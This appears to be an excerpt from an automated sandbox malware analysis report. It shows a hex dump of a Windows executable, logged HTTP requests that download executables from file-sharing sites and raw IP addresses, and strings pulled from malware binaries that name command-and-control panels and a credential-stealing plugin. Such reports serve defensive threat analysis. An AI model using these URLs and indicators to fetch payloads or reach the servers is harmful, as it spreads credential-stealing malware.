63 00 00 00 28 06 00 00 00 b0 05 00 00 08 00 00 00 78 05 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                      Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Sat, 19 Nov 2022 09:38:49 GMTContent-Type: application/octet-streamContent-Length: 129024Last-Modified: Wed, 09 Nov 2022 16:43:53 GMTConnection: keep-aliveETag: "636bd8c9-1f800"Accept-Ranges: bytesData Raw: 4d 5a 50 00 02 00 00 00 04 00 0f 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 ba 10 00 0e 1f b4 09 cd 21 b8 01 4c cd 21 90 90 54 68 69 73 20 70 72 6f 67 72 61 6d 20 6d 75 73 74 20 62 65 20 72 75 6e 20 75 6e 64 65 72 20 57 69 6e 33 32 0d 0a 24 37 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 07 00 19 5e 42 2a 00 00 00 00 00 00 00 00 e0 00 8e a1 0b 01 02 19 00 9c 01 00 00 58 00 00 00 00 00 00 7c aa 01 00 00 10 00 00 00 b0 01 00 00 00 40 00 00 10 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 40 02 00 00 04 00 00 00 00 00 00 02 00 01 00 00 00 00 00 00 00 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 f0 01 00 4f 00 00 00 00 e0 01 00 26 0e 00 00 00 20 02 00 00 14 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 02 00 e0 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 43 4f 44 45 00 00 00 00 94 9a 01 00 00 10 00 00 00 9c 01 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 44 41 54 41 00 00 00 00 b4 13 00 00 00 b0 01 00 00 14 00 00 00 a0 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 42 53 53 00 00 00 00 00 e1 09 00 00 00 d0 01 00 00 00 00 00 00 b4 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 2e 69 64 61 74 61 00 00 26 0e 00 00 00 e0 01 00 00 10 00 00 00 b4 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 65 64 61 74 61 00 00 4f 00 00 00 00 f0 01 00 00 02 00 00 00 c4 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 50 2e 72 65 6c 6f 63 00 00 e0 1d 00 00 00 00 02 00 00 1e 00 00 00 c6 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 50 2e 72 73 72 63 00 00 00 00 14 00 00 00 20 02 00 00 14 00 00 00 e4 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 50 00 00 00 00 00 00 00 00 00 00 00 00 00 40 02 00 00 00 00 00 00 f8 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 50 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
                      Source: global trafficHTTP traffic detected: GET /mmm.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: srshf.com
                      Source: global trafficHTTP traffic detected: GET /2bibu4 HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: iplogger.com
                      Source: global trafficHTTP traffic detected: GET /p8DdCeH9yd/c1844f86-1668548628/TELEGRAM.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: cdn-102.anonfiles.com
                      Source: global trafficHTTP traffic detected: GET /p8DdCeH9yd HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: anonfiles.com
                      Source: global trafficHTTP traffic detected: GET /globallinstall/updatenow1.3.5/downloads/downloadsupdated.now-1.3.5.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: bitbucket.org
                      Source: global trafficHTTP traffic detected: GET /d4f3490a-2e84-4c12-88ef-beba9da933c3/downloads/c3cdbaee-85ac-4a48-be66-78ad66e33426/downloadsupdated.now-1.3.5.exe?response-content-disposition=attachment%3B%20filename%3D%22downloadsupdated.now-1.3.5.exe%22&AWSAccessKeyId=ASIA6KOSE3BNJQ42XJV4&Signature=IUksA9vZLVbhefb7HnmbaZwnFpE%3D&x-amz-security-token=FwoGZXIvYXdzEGMaDFBfvdLs6HZ6MSBPiiK%2BAWALNPuMa6rSxHoop5qmIl2wbOjz7K7sH%2BK9q7FUpK6FzeYAa6wqhNo%2FqEszO%2B4lcaLIJqdHAQzH420%2Fct7mmuix1KE3VV7vsB4rlfrXJ%2Bx2D6O2pJRWriQDhr%2Bn%2Bj2qOVRnvilFa2z9fQCTTqBeUWhmFAgK0MmZwxAgR6DnLlikq9ZmDb%2Bfi3JvNdaDf%2FpilAEFpeKlwev59fRrV2UzPacglxt8Jkp6WYjDbHuxtVYVt1YFK5s292yvVVoUqIIox8LimwYyLdb%2BuxAdo55IMAGGklhd47631FcHjeYqUrSxnlpRpz5MqveHF3oBZfXTc5q71A%3D%3D&Expires=1668851791 HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: bbuseruploads.s3.amazonaws.com
                      Source: global trafficHTTP traffic detected: GET /get/3m3jFz/A.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: transfer.sh
                      Source: global trafficHTTP traffic detected: GET /ugzpqm9.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: hoteldostyk.com
                      Source: global trafficHTTP traffic detected: GET /get/tSjRYH/19a79daddfaac09499e79ade27e756f8.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: transfer.sh
                      Source: global trafficHTTP traffic detected: GET /70o9ncI2y0/33069690-1668848800/RGEFSDAX.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: cdn-104.anonfiles.com
                      Source: global trafficHTTP traffic detected: GET /70o9ncI2y0 HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: anonfiles.com
                      Source: global trafficHTTP traffic detected: GET /6FpuHA HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: u.to
                      Source: global trafficHTTP traffic detected: GET /attachments/1031715664227995791/1043453543480303676/Original_Build.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: cdn.discordapp.com
                      Source: global trafficHTTP traffic detected: GET /decoder1989/Wallet/raw/main/Crypted.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: github.com
                      Source: global trafficHTTP traffic detected: GET /decoder1989/Wallet/main/Crypted.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: raw.githubusercontent.com
                      Source: global trafficHTTP traffic detected: GET /decoder1989/Wallet/raw/main/Crypted.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: github.com
                      Source: global trafficHTTP traffic detected: GET /decoder1989/Wallet/main/Crypted.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: raw.githubusercontent.com
                      Source: global trafficHTTP traffic detected: GET /deadftx HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0;x64 rv:107.0) Gecko / 20100101 Firefox / 107.0Host: t.me
                      Source: global trafficHTTP traffic detected: GET /deadftx HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0;x64 rv:107.0) Gecko / 20100101 Firefox / 107.0Host: t.meCookie: stel_ssid=e3796f8cc611f4f1d7_654119648794384800
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://debvplifcf.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 182Host: o36fafs3sn6xou.com
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://kpswfp.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 278Host: o36fafs3sn6xou.com
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://sdins.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 226Host: o36fafs3sn6xou.com
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://auypktwjk.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 289Host: o36fafs3sn6xou.com
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://ebvtwkfux.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 179Host: o36fafs3sn6xou.com
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://hqmym.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 307Host: o36fafs3sn6xou.com
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://datryh.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 230Host: o36fafs3sn6xou.com
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://ajpfnqvlq.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 271Host: o36fafs3sn6xou.com
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://sxihacbmgi.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 334Host: o36fafs3sn6xou.com
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://upkkyf.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 316Host: o36fafs3sn6xou.com
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://hgusiwjl.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 129Host: o36fafs3sn6xou.com
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://ulciihlbw.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 200Host: o36fafs3sn6xou.com
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://bjtfrvl.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 361Host: o36fafs3sn6xou.com
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://vvydl.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 323Host: o36fafs3sn6xou.com
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://jtmdotimkr.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 296Host: o36fafs3sn6xou.com
                      Source: global trafficHTTP traffic detected: GET /mia/solt.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: 193.56.146.168
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://gsqxoged.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 227Host: o36fafs3sn6xou.com
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://ahgwjjm.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 226Host: o36fafs3sn6xou.com
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://efngjyqy.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 248Host: o36fafs3sn6xou.com
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://ukkwrl.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 321Host: o36fafs3sn6xou.com
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://ebaxoe.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 322Host: o36fafs3sn6xou.com
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://eqghptenl.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 279Host: o36fafs3sn6xou.com
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://ptpfdpcirh.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 169Host: o36fafs3sn6xou.com
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://etebl.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 178Host: o36fafs3sn6xou.com
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://aexqt.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 285Host: o36fafs3sn6xou.com
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://aehnv.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 158Host: o36fafs3sn6xou.com
                      Source: global trafficHTTP traffic detected: GET /1.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: 89.208.107.216
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://fbybhia.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 129Host: o36fafs3sn6xou.com
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://fhkewyoq.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 358Host: o36fafs3sn6xou.com
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://mqfbhqf.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 161Host: o36fafs3sn6xou.com
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://acxiqgb.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 301Host: o36fafs3sn6xou.com
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://xawdohy.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 189Host: o36fafs3sn6xou.com
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://uvlvsvw.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 354Host: o36fafs3sn6xou.com
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://jorxt.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 326Host: o36fafs3sn6xou.com
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://syohyc.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 175Host: o36fafs3sn6xou.com
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://cbmlqnw.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 302Host: o36fafs3sn6xou.com
                      Source: C:\Windows\explorer.exeDNS query: name: u.to
                      Source: Joe Sandbox ViewASN Name: ITOOLS-ASiToolsJSCMN ITOOLS-ASiToolsJSCMN
                      Source: Joe Sandbox ViewASN Name: UTA-ASAT UTA-ASAT
                      Source: Joe Sandbox ViewIP Address: 195.96.151.51 195.96.151.51
                      Source: 86EE.exe, 0000001E.00000002.456037519.0000000001560000.00000004.00000800.00020000.00000000.sdmp, 8C00.exe, 00000020.00000002.457565511.00000000012D0000.00000004.00000800.00020000.00000000.sdmp, 86EE.exe, 00000022.00000002.463148223.0000000000910000.00000004.00000800.00020000.00000000.sdmp, 8C00.exe, 00000029.00000002.464734781.00000000008F0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://116.202.2.1:80
                      Source: 86EE.exe, 0000001E.00000002.456037519.0000000001560000.00000004.00000800.00020000.00000000.sdmp, 8C00.exe, 00000020.00000002.457565511.00000000012D0000.00000004.00000800.00020000.00000000.sdmp, 86EE.exe, 00000022.00000002.463148223.0000000000910000.00000004.00000800.00020000.00000000.sdmp, 8C00.exe, 00000029.00000002.464734781.00000000008F0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://116.202.2.1:80checkmyprofileonthispage0;open_open
                      Source: 86EE.exe, 0000002D.00000003.485828261.000000000152B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://116.202.5.101/1148
                      Source: 86EE.exe, 0000002D.00000003.491441169.000000000152B000.00000004.00000020.00020000.00000000.sdmp, 86EE.exe, 0000002D.00000003.485828261.000000000152B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://116.202.5.101/659169136515.zip:bV
                      Source: 86EE.exe, 0000002D.00000003.476529249.0000000001523000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://116.202.5.101:80
                      Source: 86EE.exe, 0000002D.00000003.491441169.000000000152B000.00000004.00000020.00020000.00000000.sdmp, 86EE.exe, 0000002D.00000003.485828261.000000000152B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://116.202.5.101:80/659169136515.zip
                      Source: rovwer.exe, 0000000F.00000002.555134587.0000000000B33000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://193.56.146.174/
                      Source: rovwer.exe, 0000000F.00000002.555134587.0000000000B33000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://193.56.146.174/=0&pc=065367&un=user&dm=&av=13&lv=0&og=0tK
                      Source: rovwer.exe, 0000000F.00000002.555134587.0000000000B33000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://193.56.146.174/U8eZkQ0Y1ZtSx2oLs
                      Source: rovwer.exe, 0000000F.00000002.548035575.0000000000AE4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://193.56.146.174/g84kvj4jck/Plugins/cred64.dll
                      Source: rovwer.exe, 0000000F.00000002.548035575.0000000000AE4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://193.56.146.174/g84kvj4jck/Plugins/cred64.dllM
                      Source: rovwer.exe, 0000000F.00000002.548035575.0000000000AE4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://193.56.146.174/g84kvj4jck/Plugins/cred64.dllal
                      Source: rovwer.exe, 0000000F.00000002.548035575.0000000000AE4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://193.56.146.174/g84kvj4jck/Plugins/cred64.dllming
                      Source: rovwer.exe, 0000000F.00000002.542120947.0000000000AB0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://193.56.146.174/g84kvj4jck/Plugins/cred64.dlltE
                      Source: rovwer.exe, 0000000F.00000002.556830130.0000000000B4C000.00000004.00000020.00020000.00000000.sdmp, rovwer.exe, 0000000F.00000002.555134587.0000000000B33000.00000004.00000020.00020000.00000000.sdmp, rovwer.exe, 0000000F.00000002.548035575.0000000000AE4000.00000004.00000020.00020000.00000000.sdmp, rovwer.exe, 0000000F.00000002.554123576.0000000000B2E000.00000004.00000020.00020000.00000000.sdmp, rovwer.exe, 0000000F.00000002.551885520.0000000000AFF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://193.56.146.174/g84kvj4jck/index.php
                      Source: rovwer.exe, 0000000F.00000002.555134587.0000000000B33000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://193.56.146.174/g84kvj4jck/index.php%J.J
                      Source: rovwer.exe, 0000000F.00000002.555134587.0000000000B33000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://193.56.146.174/g84kvj4jck/index.php)M
                      Source: rovwer.exe, 0000000F.00000002.555134587.0000000000B33000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://193.56.146.174/g84kvj4jck/index.php1J
                      Source: rovwer.exe, 0000000F.00000002.554123576.0000000000B2E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://193.56.146.174/g84kvj4jck/index.php2142d
                      Source: rovwer.exe, 0000000F.00000002.554123576.0000000000B2E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://193.56.146.174/g84kvj4jck/index.php27
                      Source: rovwer.exe, 0000000F.00000002.555134587.0000000000B33000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://193.56.146.174/g84kvj4jck/index.php5M
                      Source: rovwer.exe, 0000000F.00000002.554123576.0000000000B2E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://193.56.146.174/g84kvj4jck/index.php6e2227
                      Source: rovwer.exe, 0000000F.00000002.555134587.0000000000B33000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://193.56.146.174/g84kvj4jck/index.php=J
                      Source: rovwer.exe, 0000000F.00000002.548035575.0000000000AE4000.00000004.00000020.00020000.00000000.sdmp, rovwer.exe, 0000000F.00000002.554123576.0000000000B2E000.00000004.00000020.00020000.00000000.sdmp, rovwer.exe, 0000000F.00000002.578032701.00000000039D0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://193.56.146.174/g84kvj4jck/index.php?scr=1
                      Source: rovwer.exe, 0000000F.00000002.548035575.0000000000AE4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://193.56.146.174/g84kvj4jck/index.php?scr=12
                      Source: rovwer.exe, 0000000F.00000002.555134587.0000000000B33000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://193.56.146.174/g84kvj4jck/index.php?scr=1kvj4jck/index.php
                      Source: rovwer.exe, 0000000F.00000002.555134587.0000000000B33000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://193.56.146.174/g84kvj4jck/index.phpIM
                      Source: rovwer.exe, 0000000F.00000002.555134587.0000000000B33000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://193.56.146.174/g84kvj4jck/index.phpUM
                      Source: rovwer.exe, 0000000F.00000002.556830130.0000000000B4C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://193.56.146.174/g84kvj4jck/index.phpded
                      Source: rovwer.exe, 0000000F.00000002.556830130.0000000000B4C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://193.56.146.174/g84kvj4jck/index.phpodedt
                      Source: rovwer.exe, 0000000F.00000002.555134587.0000000000B33000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://193.56.146.174/g84kvj4jck/index.phpqM
